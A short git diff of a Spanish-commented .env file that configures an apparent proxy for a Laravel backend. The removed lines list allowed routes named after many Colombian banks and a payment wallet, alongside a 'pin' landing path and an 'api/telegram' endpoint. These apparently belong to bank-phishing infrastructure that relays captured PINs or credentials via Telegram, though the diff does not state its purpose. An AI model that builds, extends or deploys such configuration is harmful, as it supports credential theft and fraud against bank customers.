--- a/.env
+++ b/.env
@@ -1,20 +1,11 @@
-# URL de la aplicación Laravel (backend)
+# URL de la aplicación Laravel (requerida)
 LARAVEL_APP_URL=https://central.pwm435.space
 
-# Puerto (Render usa 10000)
-PORT=10000
-
-# Rutas permitidas - Lista separada por comas (sin barras iniciales)
-ALLOWED_PATHS=pin,colpatria,bogota,occidente,popular,avvillas,cajasocial,bbva,falabella,davivienda,nequi,3co,api/telegram
-
-# Rutas bloqueadas - Lista separada por comas (patrones regex parciales)
-BLOCKED_PATHS=.env,.git,artisan,vendor,sender
+# Puerto (Render lo configura automáticamente)
+PORT=8080
 
 # Tamaño máximo de upload en MB
 MAX_UPLOAD_SIZE=100
 
-# Timeout del proxy en segundos
-PROXY_TIMEOUT=120
-
-# Redirección del dominio raíz (URL completa incluyendo https://)
-ROOT_REDIRECT=/pin/inicio
+# Timeout en segundos
+PROXY_TIMEOUT=60
